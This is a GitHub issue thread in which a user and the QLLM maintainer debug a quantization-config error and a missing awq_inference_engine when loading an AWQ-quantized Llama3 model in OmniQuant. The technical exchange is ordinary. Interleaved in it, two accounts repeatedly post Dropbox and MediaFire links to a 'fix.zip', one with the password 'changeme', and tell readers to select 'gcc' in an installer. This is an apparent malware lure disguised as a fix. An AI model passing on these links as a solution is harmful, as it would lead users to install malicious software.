### ISSUE TITLE
"The model's quantization config from the arguments has no `quant_method` attribute" for OpenGVLab/OmniQuant 

### ISSUE THREAD

**Issue by FlexLaughing** [wejoncy/QLLM#133]
Hi,buddy 
Meet an issue when using quant llama3 model to eval ppl base on OpenGVLab/OmniQuant 

Command for quantization：
--model=llama3/Llama3-8B-Chinese-Chat/ --method=awq --dataset=pileval --nsamples=16 --wbits=4 --groupsize=128 --save ./Llama3-8B-Chinese-Chat_q4

Command for OpenGVLab/OmniQuant to test ppl:
--model /test_qllm_debug/Llama3-8B-Chinese-Chat_q4 --epochs 0 --eval_ppl --wbits 4 --abits 16 --group_size 128 --lwc

Failed with:
/home/ubuntu/miniconda3_debug/envs/omniquant/bin/python /home/ubuntu/data/wangyan/test_ppl/OmniQuant-main/main.py --model /home/ubuntu/data/wangyan/test_qllm_debug/Llama3-8B-Chinese-Chat_q4_bak --epochs 0 --eval_ppl --wbits 4 --abits 16 --group_size 128 --lwc 
auto_gptq is required for real quantization
['/home/ubuntu/data/wangyan/test_ppl/OmniQuant-main/main.py', '--model', '/home/ubuntu/data/wangyan/test_qllm_debug/Llama3-8B-Chinese-Chat_q4_bak', '--epochs', '0', '--eval_ppl', '--wbits', '4', '--abits', '16', '--group_size', '128', '--lwc']
[2024-08-26 11:01:30 root](main.py 258): INFO Namespace(model='/home/ubuntu/data/wangyan/test_qllm_debug/Llama3-8B-Chinese-Chat_q4_bak', cache_dir='./cache', output_dir='../log/', save_dir=None, resume=None, real_quant=False, calib_dataset='wikitext2', nsamples=128, batch_size=1, seed=2, tasks='', eval_ppl=True, num_fewshot=0, wbits=4, abits=16, group_size=128, alpha=0.5, let_lr=0.005, lwc_lr=0.01, wd=0, epochs=0, let=False, lwc=True, aug_loss=False, symmetric=False, disable_zero_point=False, a_dynamic_method='per_token', w_dynamic_method='per_channel', limit=-1, multigpu=False, deactive_amp=False, attn_implementation='eager', net=None, act_scales=None, act_shifts=None)
Traceback (most recent call last):
  File "/home/ubuntu/data/wangyan/test_ppl/OmniQuant-main/main.py", line 375, in <module>
    main()
  File "/home/ubuntu/data/wangyan/test_ppl/OmniQuant-main/main.py", line 265, in main
    lm = LMClass(args)
  File "/home/ubuntu/data/wangyan/test_ppl/OmniQuant-main/models/LMClass.py", line 29, in __init__
    self.model = AutoModelForCausalLM.from_pretrained(args.model, config=config, device_map='cpu',torch_dtype=torch.float16)
  File "/home/ubuntu/miniconda3_debug/envs/omniquant/lib/python3.10/site-packages/transformers/models/auto/auto_factory.py", line 564, in from_pretrained
    return model_class.from_pretrained(
  File "/home/ubuntu/miniconda3_debug/envs/omniquant/lib/python3.10/site-packages/transformers/modeling_utils.py", line 3388, in from_pretrained
    config.quantization_config = AutoHfQuantizer.merge_quantization_configs(
  File "/home/ubuntu/miniconda3_debug/envs/omniquant/lib/python3.10/site-packages/transformers/quantizers/auto.py", line 161, in merge_quantization_configs
    quantization_config = AutoQuantizationConfig.from_dict(quantization_config)
  File "/home/ubuntu/miniconda3_debug/envs/omniquant/lib/python3.10/site-packages/transformers/quantizers/auto.py", line 80, in from_dict
    raise ValueError(
ValueError: The model's quantization config from the arguments has no `quant_method` attribute. Make sure that the model has been correctly quantized

Process finished with exit code 1

**Comment by wejoncy** [comment]
Hi,
This has been fixed in the main branch, Could you please try again with `pip install git+https://github.com/wejoncy/QLLM.git --no-build-isolation` to install qllm package?

**Comment by FlexLaughing** [comment]
> Hi, This has been fixed in the main branch, Could you please try again with `pip install git+https://github.com/wejoncy/QLLM.git --no-build-isolation` to install qllm package?

Thanks，so I need to get new quantization models  base on new qllm package,and then retry with  OpenGVLab/OmniQuant ppl test，Please correct me if I misunderstand!

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by wejoncy** [comment]
> > Hi, This has been fixed in the main branch, Could you please try again with `pip install git+https://github.com/wejoncy/QLLM.git --no-build-isolation` to install qllm package?
> 
> Thanks，so I need to get new quantization models base on new qllm package,and then retry with OpenGVLab/OmniQuant ppl test，Please correct me if I misunderstand!

Oh, Sorry.  I missed the error happened during eval_ppl, I need to check it first.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wejoncy** [comment]
> > Hi, This has been fixed in the main branch, Could you please try again with `pip install git+https://github.com/wejoncy/QLLM.git --no-build-isolation` to install qllm package?
> 
> Thanks，so I need to get new quantization models base on new qllm package,and then retry with OpenGVLab/OmniQuant ppl test，Please correct me if I misunderstand!

Fixed.

**Comment by FlexLaughing** [comment]
> > > Hi, This has been fixed in the main branch, Could you please try again with `pip install git+https://github.com/wejoncy/QLLM.git --no-build-isolation` to install qllm package?
> > 
> > 
> > Thanks，so I need to get new quantization models base on new qllm package,and then retry with OpenGVLab/OmniQuant ppl test，Please correct me if I misunderstand!
> 
> Fixed.

the issue have been fixed?

**Comment by wejoncy** [comment]
> > > > Hi, This has been fixed in the main branch, Could you please try again with `pip install git+https://github.com/wejoncy/QLLM.git --no-build-isolation` to install qllm package?
> > > 
> > > 
> > > Thanks，so I need to get new quantization models base on new qllm package,and then retry with OpenGVLab/OmniQuant ppl test，Please correct me if I misunderstand!
> > 
> > 
> > Fixed.
> 
> the issue have been fixed?

yes, you can easily load the quantized models with HF-transformers

**Comment by FlexLaughing** [comment]
> > > > > Hi, This has been fixed in the main branch, Could you please try again with `pip install git+https://github.com/wejoncy/QLLM.git --no-build-isolation` to install qllm package?
> > > > 
> > > > 
> > > > Thanks，so I need to get new quantization models base on new qllm package,and then retry with OpenGVLab/OmniQuant ppl test，Please correct me if I misunderstand!
> > > 
> > > 
> > > Fixed.
> > 
> > 
> > the issue have been fixed?
> 
> yes, you can easily load the quantized models with HF-transformers

seems have some net error for my env with pip install git+https://github.com/wejoncy/QLLM.git --no-build-isolation.
Did it work if i checkout tag v0.2.0 and install as below?
git clone https://github.com/wejoncy/QLLM.git
cd QLLM
python setup.py install

**Comment by wejoncy** [comment]
> > > > > > Hi, This has been fixed in the main branch, Could you please try again with `pip install git+https://github.com/wejoncy/QLLM.git --no-build-isolation` to install qllm package?
> > > > > 
> > > > > 
> > > > > Thanks，so I need to get new quantization models base on new qllm package,and then retry with OpenGVLab/OmniQuant ppl test，Please correct me if I misunderstand!
> > > > 
> > > > 
> > > > Fixed.
> > > 
> > > 
> > > the issue have been fixed?
> > 
> > 
> > yes, you can easily load the quantized models with HF-transformers
> 
> seems have some net error for my env with pip install git+https://github.com/wejoncy/QLLM.git --no-build-isolation. Did it work if i checkout tag v0.2.0 and install as below? git clone https://github.com/wejoncy/QLLM.git cd QLLM python setup.py install

Yeah, I think so

**Comment by FlexLaughing** [comment]
> > > > > > > Hi, This has been fixed in the main branch, Could you please try again with `pip install git+https://github.com/wejoncy/QLLM.git --no-build-isolation` to install qllm package?
> > > > > > 
> > > > > > 
> > > > > > Thanks，so I need to get new quantization models base on new qllm package,and then retry with OpenGVLab/OmniQuant ppl test，Please correct me if I misunderstand!
> > > > > 
> > > > > 
> > > > > Fixed.
> > > > 
> > > > 
> > > > the issue have been fixed?
> > > 
> > > 
> > > yes, you can easily load the quantized models with HF-transformers
> > 
> > 
> > seems have some net error for my env with pip install git+https://github.com/wejoncy/QLLM.git --no-build-isolation. Did it work if i checkout tag v0.2.0 and install as below? git clone https://github.com/wejoncy/QLLM.git cd QLLM python setup.py install
> 
> Yeah, I think so. wheels have been uploaded to Pypi, you can update it by "pip install -U qllm"

Cool! it works get ppl with OmniQuant  base on the new quantazition models.

**Comment by wejoncy** [comment]
It looks like `OmniQuant` defined a different WQLinear_GEMM which is different from AutoAWQ https://github.com/casper-hansen/AutoAWQ/blob/8d903b24d634d27fc8d23be46a97ee3a1025b89d/awq/modules/linear/gemm.py#L105

**Comment by FlexLaughing** [comment]
> It looks like `OmniQuant` defined a different WQLinear_GEMM which is different from AutoAWQ https://github.com/casper-hansen/AutoAWQ/blob/8d903b24d634d27fc8d23be46a97ee3a1025b89d/awq/modules/linear/gemm.py#L105

Thanks,Got it,seems OmniQuant not support qweights (auto awq common define) .

**Comment by FlexLaughing** [comment]
Just met another issue when I use v0.2.0 to infer the model
 
   return forward_call(*args, **kwargs)
  File "/home/ubuntu/miniconda3_debug/envs/qllm_0828/lib/python3.10/site-packages/transformers/models/llama/modeling_llama.py", line 617, in forward
    query_states = self.q_proj(hidden_states)
  File "/home/ubuntu/miniconda3_debug/envs/qllm_0828/lib/python3.10/site-packages/torch/nn/modules/module.py", line 1532, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/home/ubuntu/miniconda3_debug/envs/qllm_0828/lib/python3.10/site-packages/torch/nn/modules/module.py", line 1541, in _call_impl
    return forward_call(*args, **kwargs)
  File "/home/ubuntu/miniconda3_debug/envs/qllm_0828/lib/python3.10/site-packages/qllm-0.2.0-py3.10-linux-x86_64.egg/qllm/modeling/q_layers/quant_linear_awq.py", line 136, in forward
    out = awq_inference_engine.gemm_forward_cuda(
NameError: name 'awq_inference_engine' is not defined. Did you mean: 'has_awq_inference_engine'?

**Comment by wejoncy** [comment]
I see. Some torch api is not available in other version of Torch. 
You may have to install qllm by 
```
python setup.py install
``` 
to build awq_inference_engine for your environment.

**Comment by FlexLaughing** [comment]
> I see. Some torch api is not available in other version of Torch. You may have to install qllm by
> 
> ```
> python setup.py install
> ```
> 
> to build awq_inference_engine for your environment.

Thanks,it works!
